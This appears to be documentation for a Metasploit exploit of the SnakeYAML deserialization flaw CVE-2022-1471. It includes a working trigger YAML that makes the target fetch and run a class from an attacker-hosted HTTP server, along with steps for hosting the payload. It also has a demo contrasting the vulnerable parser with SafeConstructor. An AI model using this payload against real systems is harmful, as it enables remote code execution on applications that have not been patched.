# Overview
The Java source file in this directory, `MyScriptEngineFactory.java`, loads and executes a Metasploit payload. It is
intended to be served as part of the exploit for CVE-2022-1471, a deserialization vulnerability in the snakeyaml
project: SnakeYAML releases before 2.0 resolve global tags such as `!!javax.script.ScriptEngineManager` to arbitrary
classes when a document is parsed with the default `Constructor` (`new Yaml()`), so untrusted YAML can instantiate any
class on the class path. Documents parsed with `SafeConstructor` are not affected.

See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.

## Compiling
It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the
[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
files.

Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.

## Usage
Trigger the deserialization using the following YAML, replacing `192.0.2.1:8080` with the address of the HTTP server
that will host the class:

```yaml
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
```

When the target parses this document with SnakeYAML's default `Constructor`, each tag is resolved to a class and
constructed from its arguments, which amounts to
`new ScriptEngineManager(new URLClassLoader(new URL[] { new URL("http://192.0.2.1:8080/") }))`. The
`ScriptEngineManager(ClassLoader)` constructor uses `java.util.ServiceLoader` to discover `ScriptEngineFactory`
implementations through the supplied class loader, which is what fetches and instantiates the hosted class.

Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`.
The contents of this file should simply be the class name to load (`MyScriptEngineFactory`); the class itself is
requested at the path matching its package, so a class in the default package sits at the server root as
`/MyScriptEngineFactory.class`. See Metasploit's `Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more
information and the remaining components necessary to deliver a Metasploit payload.

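The vulnerable parse call beside the hardened one, as an added example that is not part of this module, of Metasploit
or of SnakeYAML. It assumes SnakeYAML 1.33 (the last release before 2.0 changed the default behaviour) on the class
path, and uses a non-existent `file:` URL constructed for the demo so that nothing is fetched: the point is only
whether the tagged document is turned into a `ScriptEngineManager` at all.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

/**
 * Added example (not Metasploit or SnakeYAML code). Shows the parse call that
 * makes an application reachable by the YAML in this README, and the parse call
 * that is not. Assumes SnakeYAML 1.33 on the class path.
 */
public class SnakeYamlDemo {

    // Same shape as the trigger document above. The URL points at a local
    // directory that does not exist (constructed for this demo), so the
    // URLClassLoader finds no providers and nothing is downloaded or run.
    static final String PAYLOAD =
        "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
        + "[[!!java.net.URL [\"file:///nonexistent-classpath/\"]]]]";

    /** Vulnerable: the default Constructor resolves any global tag to a class. */
    static Object loadUnsafe(String doc) {
        return new Yaml().load(doc);
    }

    /** Hardened: SafeConstructor only builds the standard YAML types. */
    static Object loadSafe(String doc) {
        return new Yaml(new SafeConstructor(new LoaderOptions())).load(doc);
    }

    public static void main(String[] args) {
        // With the default Constructor the document is instantiated as
        // new ScriptEngineManager(new URLClassLoader(new URL[]{ new URL(...) })),
        // whose constructor runs ServiceLoader over the attacker's class path.
        Object o = loadUnsafe(PAYLOAD);
        System.out.println("default Constructor returned: " + o.getClass().getName());

        // SafeConstructor refuses the global tag before any class is touched.
        try {
            loadSafe(PAYLOAD);
            System.out.println("unexpected: SafeConstructor accepted the document");
        } catch (YAMLException e) {
            System.out.println("SafeConstructor rejected it: " + e.getMessage());
        }
    }
}
```

Compile and run with the SnakeYAML jar on the class path (`javac -cp snakeyaml-1.33.jar SnakeYamlDemo.java` then
`java -cp snakeyaml-1.33.jar:. SnakeYamlDemo`). The first call returns a `javax.script.ScriptEngineManager`, which is
the whole vulnerability: the parser constructed a class the application never asked for. The second call throws a
`ConstructorException` (a `YAMLException`) for the unknown tag, which is the behaviour to expect from an application
that either uses `SafeConstructor` or has upgraded to SnakeYAML 2.0, where `new Yaml()` no longer resolves global tags.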
[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java